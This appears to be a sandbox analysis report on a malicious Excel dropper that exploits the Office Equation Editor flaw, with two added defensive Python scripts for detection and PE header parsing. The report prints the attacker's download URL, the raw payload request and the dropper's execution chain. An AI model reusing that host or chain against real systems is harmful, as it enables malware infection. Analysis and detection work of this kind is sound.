Windows Analysis Report
_FM_BUSAN_HOCHIMINH_.xlsx

Overview

General Information

Sample Name: _FM_BUSAN_HOCHIMINH_.xlsx
Analysis ID: 573118
MD5: 9d7bf0f2fbb81660c8b91c2a323fde4e
SHA1: 7adf1d60fd08b3accd3a8e58fbdcc674bd1b02ee
SHA256: d60188bc3e17e3fe9a8353a5eb4b791316968f3c1cea1e4e88138718efec0611
Tags: VelvetSweatshop, xlsx (the workbook is encrypted with "VelvetSweatshop", the default password Excel tries silently when opening a file, so the embedded object is encrypted at rest yet opens without a prompt)

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Drops PE files to the user root directory
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
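
The equation-editor signatures above (process start, outbound connection, file drop), together with "Execution from Suspicious Folder" and the "TCP traffic detected without corresponding DNS query" observations further down, can be replayed against endpoint telemetry. The script below is an added example, not Joe Sandbox or Sigma code: it runs those checks over Sysmon-shaped events constructed to mirror the process tree in this report. The svchost.exe parent of EQNEDT32.EXE and the chrome.exe control events are assumptions; the editor is COM-activated with -Embedding, so its parent is the DCOM launcher rather than EXCEL.EXE, which is why every rule keys on the EQNEDT32.EXE image itself and not on an Office parent.

```python
"""Replay the equation-editor checks from this report over Sysmon-shaped events.
Added example; the events below are constructed, not sandbox output."""
from dataclasses import dataclass
from ipaddress import ip_address


@dataclass
class Event:
    """Subset of Sysmon fields; event_id 1=process create, 3=network, 11=file create, 22=DNS."""
    event_id: int
    image: str
    parent_image: str = ""
    command_line: str = ""
    dest_ip: str = ""
    dest_port: int = 0
    target_filename: str = ""
    query_results: str = ""      # Sysmon EID 22 QueryResults, e.g. "type: 5 93.184.216.34;"


EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROP_DIRS = ("\\users\\public\\", "\\appdata\\local\\temp\\", "\\temporary internet files\\")
SUSPICIOUS_EXEC_DIRS = ("\\users\\public\\", "\\appdata\\local\\temp\\")


def is_eqnedt(path: str) -> bool:
    """Match on the image name, not the parent: EQNEDT32.EXE is COM-activated and is
    not a child of EXCEL.EXE, so parent-based Office rules miss it."""
    return path.upper().endswith("\\EQNEDT32.EXE")


def resolved_ips(query_results: str) -> set:
    """Extract the IP answers from a Sysmon DNS QueryResults string."""
    ips = set()
    for tok in query_results.replace(";", " ").split():
        tok = tok.removeprefix("::ffff:")   # Sysmon also writes v4-mapped forms
        try:
            ips.add(str(ip_address(tok)))
        except ValueError:
            pass                            # "type:" markers and record-type numbers
    return ips


def evaluate(events) -> list:
    """Return (rule, detail) pairs. Events are processed in order so that earlier
    DNS answers can explain later connections."""
    resolved, hits = set(), []
    for ev in events:
        if ev.event_id == 22:
            resolved |= resolved_ips(ev.query_results)
        elif ev.event_id == 1:
            if is_eqnedt(ev.parent_image):
                hits.append(("Office equation editor starts process", ev.image))
            if any(d in ev.image.lower() for d in SUSPICIOUS_EXEC_DIRS):
                hits.append(("Execution from suspicious folder", ev.image))
        elif ev.event_id == 3:
            if is_eqnedt(ev.image):
                hits.append(("EQNEDT32.EXE connecting to internet", f"{ev.dest_ip}:{ev.dest_port}"))
            if ip_address(ev.dest_ip).is_global and ev.dest_ip not in resolved:
                hits.append(("TCP traffic without corresponding DNS query", f"{ev.image} -> {ev.dest_ip}"))
        elif ev.event_id == 11:
            if is_eqnedt(ev.image) and any(d in ev.target_filename.lower() for d in DROP_DIRS):
                hits.append(("File dropped by EQNEDT32.EXE", ev.target_filename))
    return hits


# Constructed events mirroring the process tree in this report (not sandbox output).
# The svchost.exe parent and the chrome.exe control traffic are assumptions.
SAMPLE_EVENTS = [
    Event(1, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", r"C:\Windows\explorer.exe",
          r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'),
    Event(1, EQNEDT, r"C:\Windows\System32\svchost.exe", f'"{EQNEDT}" -Embedding'),
    Event(22, r"C:\Program Files\Google\Chrome\Application\chrome.exe", query_results="type: 5 93.184.216.34;"),
    Event(3, r"C:\Program Files\Google\Chrome\Application\chrome.exe", dest_ip="93.184.216.34", dest_port=443),
    Event(3, EQNEDT, dest_ip="198.46.132.195", dest_port=80),
    Event(11, EQNEDT, target_filename=r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe"),
    Event(11, EQNEDT, target_filename=r"C:\Users\Public\vbc.exe"),
    Event(1, r"C:\Users\Public\vbc.exe", EQNEDT, r'"C:\Users\Public\vbc.exe"'),
]

if __name__ == "__main__":
    for rule, detail in evaluate(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

Run as-is it prints six hits: two for the connection to 198.46.132.195 (editor network activity, and a public IP with no DNS answer behind it), two file drops, and two for vbc.exe (spawned by the editor, and run from C:\Users\Public). The chrome.exe traffic produces nothing because its destination was resolved first.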

Classification

AV Detection

Source: _FM_BUSAN_HOCHIMINH_.xlsx Virustotal: Detection: 38%
Source: _FM_BUSAN_HOCHIMINH_.xlsx ReversingLabs: Detection: 35%
Source: http://198.46.132.195/ProgramFile/.win32.exe Virustotal: Detection: 6%

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.46.132.195:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 66MB
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View IP Address: 198.46.132.195
Source: global traffic HTTP traffic detected:
HTTP/1.1 200 OK
Date: Wed, 16 Feb 2022 08:11:23 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Thu, 27 Jan 2022 15:00:29 GMT
ETag: "10b990-5d69194428b49"
Accept-Ranges: bytes
Content-Length: 1096080
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 be 3e 87 5d 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d8 08 00 00 a0 07 00 00 00 00 00 96 fe 06 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 11 00 00 04 00 00 8e 81 11 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 35 0b 00 b4 00 00 00 00 d0 0b 00 30 b0 04 00 00 00 00 00 00 00 00 00 00 7c 10 00 90 3d 00 00 00 90 10 00 1c 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a9 09 00 5c 00 00 00 00 00 00 00 00 00 00 00 2c 3b 0b 00 28 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5e d6 08 00 00 10 00 00 00 d8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ac 6c 02 00 00 f0 08 00 00 6e 02 00 00 dc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 4e 00 00 00 60 0b 00 00 0a 00 00 00 4a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 b0 0b 00 00 02 00 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 66 69 64 73 00 00 b4 00 00 00 00 c0 0b 00 
00 02 00 00 00 56 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 30 b0 04 00 00 d0 0b 00 00 b2 04 00 00 58 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 90 10 00 00 72 00 00 00 0a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected:
GET /ProgramFile/.win32.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.46.132.195
Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195 (50 occurrences)
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://ocsp.thawte.com0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: vbc.exe, 00000004.00000000.473834838.000000000141F000.00000002.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.698040978.0000000000230000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.698210832.000000000141F000.00000002.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: vbc.exe.2.dr, .win32[1].exe.2.dr String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87C9FA8A.emf
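
The Data Raw bytes printed for the .win32.exe response are the first 0x288 bytes of the download, enough to read the complete PE header and section table. The script below is an added example, not part of the sandbox output: it decodes those bytes with the standard library and shows what they support on their own. The hex is the report's, regrouped by header field (only whitespace changed; the DOS stub is spelled as text), and the Content-Length is the one from the response headers. Two points matter for triage: .00cfg and .gfids, which the report later counts as "sections with non-standard names", are the Control Flow Guard sections the MSVC linker emits and say nothing about the author; and the Security data directory (file offset 0x107c00, size 0x3d90) ends exactly at byte 1096080, so the file carries an Authenticode certificate table, consistent with the Comodo and Thawte CRL and OCSP URLs found in the dropped copies, and the download was complete. Whether that signature verifies is not shown in the report.

```python
"""Decode the PE headers the sandbox printed as 'Data Raw' for the
GET /ProgramFile/.win32.exe response and cross-check them against the
HTTP Content-Length. Added example, stdlib only; hex regrouped by field."""
import struct
from datetime import datetime, timezone

DOS_HEADER = bytes.fromhex(
    "4d5a7800 01000000 04000000 00000000"   # 'MZ', e_cblp=0x78, e_cp=1, e_crlc=0, e_cparhdr=4, ...
    "00000000 00000000 40000000 00000000"   # e_lfarlc=0x40
    + "00" * 28                             # e_res, e_oemid, e_oeminfo, e_res2: all zero
    + "78000000"                            # e_lfanew=0x78
)
DOS_STUB = bytes.fromhex("0e1fba0e00b409cd21b8014ccd21") + b"This program cannot be run in DOS mode.$\x00\x00"
NT_HEADERS = bytes.fromhex(
    "50450000 4c01 0700 be3e875d 00000000 00000000 e000 0201"                      # PE\0\0, i386, 7 sections, TimeDateStamp, symtab, nsyms, opt size, characteristics
    "0b01 0e00 00d80800 00a00700 00000000 96fe0600 00100000 00000000 00004000"    # PE32, linker 14.0, code/data sizes, EntryPoint, BaseOfCode, BaseOfData, ImageBase
    "00100000 00020000 0500 0100 0000 0000 0500 0100 00000000 00101100 00040000"  # alignments, OS/image/subsystem versions, SizeOfImage, SizeOfHeaders
    "8e811100 0200 4081 00001000 00100000 00001000 00100000 00000000 10000000"    # CheckSum, GUI subsystem, DllCharacteristics, stack/heap, LoaderFlags, 16 dirs
    "0000000000000000 50350b00b4000000 00d00b0030b00400 0000000000000000"         # export, import, resource, exception
    "007c1000903d0000 009010001c710000 0000000000000000 0000000000000000"         # security (file offset!), basereloc, debug, architecture
    "0000000000000000 0000000000000000 18a909005c000000 0000000000000000"         # globalptr, TLS, load config, bound import
    "2c3b0b0028050000 0000000000000000 0000000000000000 0000000000000000"         # IAT, delay import, CLR, reserved
)
SECTION_TABLE = bytes.fromhex(
    "2e74657874000000 5ed60800 00100000 00d80800 00040000 00000000 00000000 0000 0000 20000060"  # .text
    "2e72646174610000 ac6c0200 00f00800 006e0200 00dc0800 00000000 00000000 0000 0000 40000040"  # .rdata
    "2e64617461000000 304e0000 00600b00 000a0000 004a0b00 00000000 00000000 0000 0000 400000c0"  # .data
    "2e30306366670000 04000000 00b00b00 00020000 00540b00 00000000 00000000 0000 0000 40000040"  # .00cfg
    "2e67666964730000 b4000000 00c00b00 00020000 00560b00 00000000 00000000 0000 0000 40000040"  # .gfids
    "2e72737263000000 30b00400 00d00b00 00b20400 00580b00 00000000 00000000 0000 0000 40000040"  # .rsrc
    "2e72656c6f630000 1c710000 00901000 00720000 000a1000 00000000 00000000 0000 0000 40000042"  # .reloc
)
HEADERS = DOS_HEADER + DOS_STUB + NT_HEADERS + SECTION_TABLE   # first 648 bytes of the download
CONTENT_LENGTH = 1096080                                        # from the HTTP response headers in the report
MSVC_CFG_SECTIONS = {".00cfg", ".gfids"}                        # emitted by the MSVC linker for Control Flow Guard


def parse_pe(data: bytes) -> dict:
    """Decode DOS, COFF and PE32 optional headers plus the section table from an image prefix."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]                      # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24
    magic, lmaj, lmin = struct.unpack_from("<HBB", data, opt)
    if magic != 0x10B:
        raise ValueError("not a PE32 image")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii"), "vsize": f[1], "va": f[2],
                         "raw_size": f[3], "raw_ptr": f[4], "chars": f[9]})
    return {"machine": machine, "num_sections": nsec, "timestamp": stamp,
            "build_time": datetime.fromtimestamp(stamp, timezone.utc).isoformat(),
            "characteristics": chars, "linker": (lmaj, lmin), "entry_point": entry,
            "image_base": image_base, "subsystem": subsystem, "dll_characteristics": dll_chars,
            "data_dirs": dirs, "sections": sections}


def expected_file_size(pe: dict) -> int:
    """The certificate table (data directory 4, file-offset based) is appended after the
    last section, so its end is where a signed file ends; unsigned images end at the
    last section's raw data."""
    sec_off, sec_size = pe["data_dirs"][4]
    if sec_size:
        return sec_off + sec_size
    last = max(pe["sections"], key=lambda s: s["raw_ptr"])
    return last["raw_ptr"] + last["raw_size"]


def toolchain_sections(pe: dict) -> list:
    """Section names that are linker artifacts rather than attacker-chosen."""
    return [s["name"] for s in pe["sections"] if s["name"] in MSVC_CFG_SECTIONS]


if __name__ == "__main__":
    hdr = parse_pe(HEADERS)
    print(f"machine=0x{hdr['machine']:x} sections={hdr['num_sections']} built={hdr['build_time']}")
    print("sections:", [s["name"] for s in hdr["sections"]], "cfg:", toolchain_sections(hdr))
    print(f"signed={bool(hdr['data_dirs'][4][1])} expected={expected_file_size(hdr)} content_length={CONTENT_LENGTH}")
```

Against the bytes in this report the header decodes to a 32-bit GUI executable (machine 0x14c, DllCharacteristics 0x8140: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE), linker 14.0, TimeDateStamp 0x5d873ebe (2019-09-22 09:28:30 UTC), entry point RVA 0x6fe96 at image base 0x400000, and an expected size of 1096080 bytes, identical to the Content-Length and to the "10b990" prefix of the Apache ETag.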

System Summary

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe
Source: C:\Users\Public\vbc.exe Code function: 4_2_0140092D
Source: C:\Users\Public\vbc.exe Code function: 4_2_0141E13E
Source: C:\Users\Public\vbc.exe Code function: 4_2_013A3DF6
Source: C:\Users\Public\vbc.exe Code function: 4_2_014198F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_01400880
Source: C:\Users\Public\vbc.exe Code function: 4_2_013E574E
Source: C:\Users\Public\vbc.exe Code function: 4_2_013A57BF
Source: C:\Users\Public\vbc.exe Code function: 4_2_01405792
Source: C:\Users\Public\vbc.exe Code function: 4_2_013A3606
Source: C:\Users\Public\vbc.exe Code function: 4_2_01404E15
Source: C:\Users\Public\vbc.exe Code function: 4_2_013A46DE
Source: C:\Users\Public\vbc.exe Code function: 4_2_01405EB0
Source: C:\Users\Public\vbc.exe Code function: String function: 0140BDBF appears 61 times
Source: .win32[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (4 resources)
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (4 resources)
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe 736330AAA3A4683D3CC866153510763351A60062A236D22B12F4FE0F10853582
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$_FM_BUSAN_HOCHIMINH_.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRFA55.tmp
Source: classification engine Classification label: mal96.expl.winXLSX@4/20@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe Window detected: Number of UI elements: 21
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Users\Public\vbc.exe Code function: 4_2_014004C6 push ecx; ret
Source: .win32[1].exe.2.dr Static PE information: section name: .00cfg (Control Flow Guard section emitted by the MSVC linker, not an attacker-chosen name)
Source: vbc.exe.2.dr Static PE information: section name: .00cfg (Control Flow Guard section emitted by the MSVC linker, not an attacker-chosen name)

Boot Survival

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (10 occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (8 occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952 Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\vbc.exe Code function: 4_2_014119B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter (the MSVC CRT fast-fail handler pattern; on its own not evidence of deliberate anti-debugging)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0140A9D6 mov eax, dword ptr fs:[00000030h] (reads the PEB)
Source: C:\Users\Public\vbc.exe Code function: 4_2_013FFC48 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (the MSVC CRT security-failure handler pattern)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Code function: 4_2_01400125 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter (the MSVC CRT __security_init_cookie pattern that seeds the stack cookie; not timing-based evasion)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0141C3A6 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte